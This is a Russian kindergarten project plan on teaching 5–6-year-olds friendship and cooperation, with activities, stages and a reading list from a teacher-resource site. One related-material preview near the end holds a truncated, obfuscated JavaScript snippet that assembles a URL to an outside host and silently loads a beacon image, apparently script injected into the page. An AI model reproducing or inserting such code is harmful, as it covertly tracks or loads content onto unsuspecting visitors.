Проект "Давай дружить!"
проект (старшая группа) на тему

Артемова Татьяна Валериевна

Проблема формирования положительных взаимоотношений между детьми, является актуальной, так как способствует вхождению ребенка в социум, взаимодействию с окружающими людьми. Реализация данного проекта способствует формированию дружеских взаимоотношений у детей группы: умение жить в коллективе, считаться с мнением других детей, адекватно оценивать себя и своих друзей, помогает усвоить нормы и правила поведения, облегчает переход из детского сада в школу, к активному общению в период адаптации.

Скачать:

ВложениеРазмер
Microsoft Office document icon davay_druzhit.doc38.5 КБ

Предварительный просмотр:

Проект «Давай дружить!»

Тип проекта: групповой, творческий, информационный, игровой, познавательный

Классификация: долгосрочный (сентябрь)

Состав участников: групповой; участники: дети, родители, воспитатели, музыкальный руководитель

Возраст: 5-6 лет

Используемые образовательные технологии:

Игры и упражнения на развитие эмоциональной сферы

Спортивные игры и соревнования

Технология музыкального воздействия

Технология воздействия живописью

Технология познавательного развития

Использование мультимедийных презентаций

Актуальность:

Проблема формирования положительных взаимоотношений между детьми, является актуальной, так как способствует вхождению ребенка в социум, взаимодействию с окружающими людьми. Реализация данного проекта способствует формированию дружеских взаимоотношений у детей группы: умение жить в коллективе, считаться с мнением других детей, адекватно оценивать себя и своих друзей, помогает усвоить нормы и правила поведения, облегчает переход из детского сада в школу, к активному общению в период адаптации. 

Цель проекта: 

Формирование положительных взаимоотношений детей старшего дошкольного возраста со сверстниками в группе. 

Задачи: 

1. Воспитательные: воспитывать дружелюбие, доброжелательное отношение друг к другу, сопереживание, сочувствие, взаимопомощь, потребность проявлять доброту, заботу, внимательное отношение к окружающим, способствовать сплоченности коллектива.

2. Развивающие: развивать коммуникативные навыки, социально- коммуникативные качества (сотрудничество, гибкость, терпимость, умение поддерживать развивающий диалог, развивать связную речь, обогащать словарный запас, побуждать к использованию в речи пословиц и поговорок, умение применять свои знания на практике, развивать творчество в художественно- продуктивной деятельности.

3. Обучающие: расширять и систематизировать знания о культуре поведения и взаимоотношениях между детьми, учить размышлять над нравственной сутью поступков.

Пути решения поставленных задач

-Развитие познавательной деятельности дошкольников в ходе совместной практической деятельности с воспитателем и родителями (обогащение знаний детей о роли мамы в их жизни, через раскрытие образа матери в поэзии, в живописи, музыке, художественной литературе; воспитание заботливого, уважительного отношения к маме; совершенствование уровня накопленных практических навыков детей и родителей:

-Развитие художественного вкуса детей и взрослых,

-Развитие творческих способностей детей в продуктивной и в музыкальной деятельности,

-Совершенствование стиля партнёрских отношений.

-Расширение кругозора детей и закрепление их знаний ;

-Осуществление в группе воспитательно-образовательного процесса по обозначенной теме.

-Обогащение активного словаря детей эпитетами, образными выражениями, пословицами и поговорками, стихами о маме

-Развитие связной речи, умения составлять  повествовательные рассказы, опираясь на личный опыт.

-Развитие продуктивной деятельности детей; достижение плодотворного результата по художественному творчеству детей в разных направлениях (рисунки, аппликация, лепка); развитие детского творчества;

-Создание и обогащение картотеки «Художественного народного творчества произведений о маме»  совместно с родителями.

-Вовлечение родителей в педагогический и творческий процесс работы группы, укрепление заинтересованности в сотрудничестве с детским садом Статьи в родительский уголок «День матери: история и традиции»; подбор журналов,  литературы для индивидуальной работы родителям на тему «Роль матери в воспитании ребенка в семье». «Изречения известных людей о маме». Беседы с родителями на эти темы.

-Проведение «Вечера сказок» (чтение сказок мамой, викторины по сказкам, драматизация).

Поэтапное развитие проекта «Давай дружить!»

Этапы

Содержание

1.

Выбор темы проекта

сентябрь

Удовлетворение интересов и потребностей ребенка, запросов родителей. Инициатор воспитатель, музыкальный руководитель

2.

Планирование

-Беседа с детьми и родителями

-Изготовление совместно с ребенком подарка - сюрприза его другу;

-Наблюдение за детьми

-Системная паутинка проекта

-Календарное планирование

3.

Реализация проекта

Задача воспитателя; организация деятельности детей в центрах активности, оснащение центров оборудованием и материалами в соответствии с темой проекта:

- Создание проблемной ситуации — День рождение друга

-Подбор методической литературы по данной теме; разработка конспектов занятий

-Подбор художественной детской литературы

-Подбор аудиозаписей по данной теме.

-Подбор дидактического материала, иллюстраций.«Добрые слова», «Не забывай о друзьях», «Опиши своего друга», «Комплименты», «Закончи фразу»,  видеороликов.

Создание развивающей среды (оснащение центров активности)

 Подбор детской художественной литературы для книжного уголка

Подбор настольно–печатных и дидактических игр

  

Центр физического развития: создание предметно-развивающей среды и совместное изготовление атрибутов  для двигательной активности детей

Центр продуктивной деятельности: подборка материалов для рисования, лепки, аппликации

4.

Итоговое мероприятие

30 сентября

Вечер развлечений «Остров Дружба»

5.

Завершение проекта

Создание презентации проекта

Системная паутинка проекта «Давай дружить!»

Образовательная область

Непосредственно образовательная деятельность

1.

Социально-коммуникативное развитие

Этическая беседа: «В чем сила дружбы? »

- Беседа «Если с другом вышел в путь»;

- Игровые упражнения «Кто первым поздоровается?»;

- Дидактическая игра «Наши добрые слова»; 

-Образовательные ситуации: «Уроки вежливости»

- Сюжетно-ролевые игры: «В гости к другу», «Друг заболел», «Бюро добрых услуг», День рождение подружки»

-Труд. Коллективная постройка песочной композиции

-«Давайте познакомимся» - коммуникативные игры

2.

Художественно-эстетическое развитие

- Рассматривание картинок с развивающим диалогом: «Хорошо ли злиться? », «Хорошо ли обижаться? », «Умею ли я мириться? » (из серии (Я и мое поведение»)

- Чтение художественной литературы с последующей беседой: В. Осеева «До первого дождя», В. Катаев «Цветик- семицветик», С. Михалков «Хорошие товарищи», Е. Благина «Подарок», «Кто живет в пруду?», «Малыш и Карлсон», Софья Прокофьева «Сказка про грубое слово «уходи», «Сказка про волшебные перышки»; Генрих Сапгир «Мой друг зонтик»

-Художественное творчество:

Рисование: «Я и мои друзья», «Радуга Дружбы», «Нарисуй какую хочешь картинку для своего друга».

Аппликация. Изготовление коллективного панно «Дом Дружбы ».  

-Этюды : друзья поссорились, сердятся, друзья померились, радуются;  «Угадай мое настроение», «Передай свое настроение»; 

-Минутки изобразительной деятельности: «Дорисуй мой рисунок»

Просмотр мультфильмов о дружбе «Кот Леопольд», «Львенок и черепаха», «По дороге с облаками», «Грибок — теремок», «Кто похвалит меня лучше всех»

-Слушание и пение песен о дружбе: «Улыбка», «Настоящий друг», «Веселые друзья», «Все мы делим пополам»

-Концерт для осенних именинников «От улыбки станет всем светлей». 

- Инсценировка произведения В. Осеевой «Волшебное слово»; 

3.

Речевое развитие

Беседы: «Доброта и вежливость- залог дружбы», «Секреты дружбы»

-Составление  ребенком рассказа о его друге;

- Словесные, коммуникативные игры: «Назови ласково», «Угадай, чей голосок» «Кто похвалит друга лучше всех», «Волшебная конфета» - учить говорить друг другу комплименты

- Заучивание стихов о дружбе «Наша группа», «Наши игрушки», «Новая девочка», «Мы подружились в детском саду», «Детский сад», «Друзья».

- Вечер пословиц и поговорок о дружбе

- Ситуативные разговоры, игры- интервью: «Скажи мне, кто твой друг? », «Каким должен быть друг? » «Хороший ли ты друг? », «Хорошо ли иметь друга? », «Чем можно порадовать друга? » «Что ты сегодня сделал приятного для друга? »

4.

Познавательное развитие

-Беседа «Драться или договариваться»;

-Дидактические игры: «Что такое хорошо, что такое плохо», «Как хорошо с тобой дружить»; «Правила поведения»

-Составление правил о поведение в группе

-Игра «Ромашка» -какими качествами должен обладать настоящий друг

5.

Физическое развитие

Зарядка «Вместе весело шагать!»

-Подвижные игры: «Ручеек», «Кот и мышка», «Апельсин», «Твистер», игра- шутка: «Сиамские близнецы»

-Игры на сотрудничество: «Слепой и поводырь»,

«Паутина», «Путаница», «Обруч», «Дорожка препятствий».

Спортивное соревнование «Если с другом вышел путь»

Литература:

Нечаева В.Г., МарковаТ.А., Жуковская Р.И., Година Г.Н., Козлова С.А., Виноградова Н.Ф., Буре Р.С., Загик Л.В., Виноградова А.М. Нравственное воспитание в детском саду. – 3-е изд., испр. и доп. – М.: Просвещение, 1984.

Петрова В.И., Стульник Т.Д. Этические беседы с детьми 4-7 лет: Нравственное воспитание в детском саду. Пособие для педагогов и методистов. – 2-е изд., испр. и доп. – М.: Мозаика-Синтез, 2008.

Ветлугина Н.А., Казакова Т.Г. Нравственно-эстетическое воспитание ребенка в детском саду. – М.: Просвещение, 1989.

Журавлева Е.Н. Развиваем творческое воображение дошкольников: пособие для педагогов учреждений, обеспечивающих получение дошкольного образования. – Мозырь: Белый Ветер, 2010.

Комарова Т.С., Савенков А.И. Коллективное творчество дошкольников: Учебное пособие. – М.: Педагогическое общество России, 2005.


По теме: методические разработки, презентации и конспекты

Проект «C туризмом дружит вся семья» (старший дошкольный возраст)

Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....

Если хочешь долго жить - научись с огнем дружить!

Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....

Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"

Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...

Конспект занятия "Давайте дружить"

Конспект занятия по развитию речи в 1 младшей группе....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...